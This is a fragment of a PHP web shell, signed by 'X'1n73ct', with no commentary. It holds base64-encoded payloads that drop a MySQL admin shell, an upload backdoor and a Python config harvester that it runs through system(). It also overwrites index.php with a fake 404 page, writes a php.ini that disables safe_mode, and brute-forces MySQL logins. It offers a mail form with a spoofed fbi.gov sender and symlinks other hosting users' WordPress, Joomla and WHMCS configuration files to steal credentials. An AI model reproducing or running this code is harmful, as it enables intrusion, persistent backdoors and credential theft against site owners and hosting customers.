ICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdG
|
||
|
$file = fopen("db-sql.php" ,"w+");
|
||
|
$write = fwrite ($file ,base64_decode($sqlshell));
|
||
|
fclose($file);
|
||
|
chmod("db-sql.php", 0644);
|
||
|
$indexshell = fopen("index.php" ,"w+");
|
||
|
$data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
|
||
|
$tulis = fwrite( $indexshell, base64_decode($data));
|
||
|
fclose($indexshell);
|
||
|
echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>";
|
||
|
}
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){
|
||
|
if(isset($_POST['mail_send'])){
|
||
|
$mail_to = $_POST['mail_to'];
|
||
|
$mail_from = $_POST['mail_from'];
|
||
|
$mail_subject = $_POST['mail_subject'];
|
||
|
$mail_content = magicboom($_POST['mail_content']);
|
||
|
if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){
|
||
|
$msg = "email sent to $mail_to";
|
||
|
}
|
||
|
else $msg = "send email failed";
|
||
|
}
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=mail" method="post">
|
||
|
<table class="cmdbox">
|
||
|
<tr><td>
|
||
|
<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>
|
||
|
<tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr>
|
||
|
<tr><td> <input class="inputz" style="width:20%;" type="text" value="X-1n73ct@fbi.gov" name="mail_from" /> from</td></tr>
|
||
|
<tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr>
|
||
|
<tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
|
||
|
<tr><td> <?php echo $msg; ?></td></tr>
|
||
|
</table>
|
||
|
</form>
|
||
|
|
||
|
<?php }
|
||
|
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
|
||
|
@ob_start();
|
||
|
@eval("phpinfo();");
|
||
|
$buff = @ob_get_contents();
|
||
|
@ob_end_clean();
|
||
|
$awal = strpos($buff,"<body>")+6;
|
||
|
$akhir = strpos($buff,"</body>");
|
||
|
echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
|
||
|
}
|
||
|
elseif(isset($_GET['view']) && ($_GET['view'] != "")){
|
||
|
if(is_file($_GET['view'])){
|
||
|
if(!isset($file)) $file = magicboom($_GET['view']);
|
||
|
if(!$win && $posix){
|
||
|
$name=@posix_getpwuid(@fileowner($folder));
|
||
|
$group=@posix_getgrgid(@filegroup($folder));
|
||
|
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
|
||
|
}
|
||
|
else {
|
||
|
$owner = $user;
|
||
|
}
|
||
|
$filn = basename($file);
|
||
|
echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
|
||
|
<tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
|
||
|
<form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
|
||
|
<input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
|
||
|
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
|
||
|
</form>
|
||
|
</td></tr>
|
||
|
<tr><td>Size</td><td>".ukuran($file)."</td></tr>
|
||
|
<tr><td>Permission</td><td>".get_perms($file)."</td></tr>
|
||
|
<tr><td>Owner</td><td>".$owner."</td></tr>
|
||
|
<tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
|
||
|
<tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
|
||
|
<tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
|
||
|
<tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr>
|
||
|
<tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr>
|
||
|
</table>
|
||
|
";
|
||
|
if(isset($_GET['type']) && ($_GET['type']=='image')){
|
||
|
echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>";
|
||
|
}
|
||
|
elseif(isset($_GET['type']) && ($_GET['type']=='code')){
|
||
|
echo "<div class=\"viewfile\">";
|
||
|
$file = wordwrap(@file_get_contents($file),"240","\n");
|
||
|
@highlight_string($file);
|
||
|
echo "</div>";
|
||
|
}
|
||
|
else {
|
||
|
echo "<div class=\"viewfile\">";
|
||
|
echo nl2br(htmlentities((@file_get_contents($file))));
|
||
|
echo "</div>";
|
||
|
}
|
||
|
}
|
||
|
elseif(is_dir($_GET['view'])){
|
||
|
echo showdir($pwd,$prompt);
|
||
|
}
|
||
|
|
||
|
}
|
||
|
elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
|
||
|
|
||
|
if(isset($_POST['save'])){
|
||
|
$file = $_POST['saveas'];
|
||
|
$content = magicboom($_POST['content']);
|
||
|
if($filez = @fopen($file,"w")){
|
||
|
$time = date("d-M-Y H:i",time());
|
||
|
if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
|
||
|
else $msg = "failed to save";
|
||
|
@fclose($filez);
|
||
|
}
|
||
|
else $msg = "permission denied";
|
||
|
}
|
||
|
if(!isset($file)) $file = $_GET['edit'];
|
||
|
if($filez = @fopen($file,"r")){
|
||
|
$content = "";
|
||
|
while(!feof($filez)){
|
||
|
$content .= htmlentities(str_replace("''","'",fgets($filez)));
|
||
|
}
|
||
|
@fclose($filez);
|
||
|
}
|
||
|
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
|
||
|
<table class="cmdbox">
|
||
|
<tr><td colspan="2">
|
||
|
<textarea class="output" name="content">
|
||
|
<?php echo $content; ?>
|
||
|
</textarea>
|
||
|
<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
|
||
|
<?php echo $msg; ?></td></tr>
|
||
|
</table>
|
||
|
</form>
|
||
|
<?php
|
||
|
}
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=logout" method="post">
|
||
|
|
||
|
<?php
|
||
|
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
|
||
|
echo 'bye!';
|
||
|
}
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=brute" method="post">
|
||
|
<?php
|
||
|
//bruteforce
|
||
|
?>
|
||
|
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
|
||
|
<?php
|
||
|
/*
|
||
|
Recoded By X'1n73ct
|
||
|
*/
|
||
|
@set_time_limit(0);
|
||
|
@error_reporting(0);
|
||
|
|
||
|
|
||
|
if($_POST['page']=='find')
|
||
|
{
|
||
|
if(isset($_POST['usernames']) && isset($_POST['passwords']))
|
||
|
{
|
||
|
if($_POST['type'] == 'passwd'){
|
||
|
$e = explode("\n",$_POST['usernames']);
|
||
|
foreach($e as $value){
|
||
|
$k = explode(":",$value);
|
||
|
$username .= $k['0']." ";
|
||
|
}
|
||
|
}elseif($_POST['type'] == 'simple'){
|
||
|
$username = str_replace("\n",' ',$_POST['usernames']);
|
||
|
}
|
||
|
$a1 = explode(" ",$username);
|
||
|
$a2 = explode("\n",$_POST['passwords']);
|
||
|
$id2 = count($a2);
|
||
|
$ok = 0;
|
||
|
foreach($a1 as $user )
|
||
|
{
|
||
|
if($user !== '')
|
||
|
{
|
||
|
$user=trim($user);
|
||
|
for($i=0;$i<=$id2;$i++)
|
||
|
{
|
||
|
$pass = trim($a2[$i]);
|
||
|
if(@mysql_connect('localhost',$user,$pass))
|
||
|
{
|
||
|
echo "X'1n73ct~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
|
||
|
$ok++;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x'1n73ct</b>";
|
||
|
echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
|
||
|
exit;
|
||
|
}
|
||
|
}
|
||
|
if($_POST['pass']=='password'){
|
||
|
@error_reporting(0);
|
||
|
$i = getenv('REMOTE_ADDR');
|
||
|
$d = date('D, M jS, Y H:i',time());
|
||
|
$h = $_SERVER['HTTP_HOST'];
|
||
|
$dir=$_SERVER['PHP_SELF'];
|
||
|
$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
|
||
|
$file = fopen(".php","w+");
|
||
|
$write = fwrite ($file ,base64_decode($back));
|
||
|
fclose($file);
|
||
|
chmod(".php",0755);
|
||
|
mkdir('config',0755);
|
||
|
$cp =
|
||
|
'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLC
|
||
|
$file = fopen("cp.py","w+");
|
||
|
$write = fwrite ($file ,base64_decode($cp));
|
||
|
fclose($file);
|
||
|
chmod("cp.py",0755);
|
||
|
$url = $_POST['url'];
|
||
|
echo"<center>
|
||
|
<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
|
||
|
system("python cp.py $url config");
|
||
|
unlink ('cp.py');
|
||
|
echo"</textarea>
|
||
|
</center>";
|
||
|
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
|
||
|
exit;
|
||
|
}
|
||
|
if($_POST['matikan']=='sekatan'){
|
||
|
@error_reporting(0);
|
||
|
$phpini =
|
||
|
'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
|
||
|
$file = fopen("php.ini","w+");
|
||
|
$write = fwrite ($file ,base64_decode($phpini));
|
||
|
fclose($file);
|
||
|
$htaccess =
|
||
|
'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
|
||
|
$file = fopen(".htaccess","w+");
|
||
|
$write = fwrite ($file ,base64_decode($htaccess));
|
||
|
echo "<hr><center><b>DONE!";
|
||
|
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
|
||
|
exit;
|
||
|
}
|
||
|
if($_POST['mendapatkan']=='passwd'){
|
||
|
@set_magic_quotes_runtime(0);
|
||
|
ob_start();
|
||
|
error_reporting(0);
|
||
|
@set_time_limit(0);
|
||
|
@ini_set('max_execution_time',0);
|
||
|
@ini_set('output_buffering',0);
|
||
|
$fn = $_POST['foldername'];
|
||
|
//all function here
|
||
|
|
||
|
function syml($usern,$pdomain)
|
||
|
{
|
||
|
symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
|
||
|
symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
|
||
|
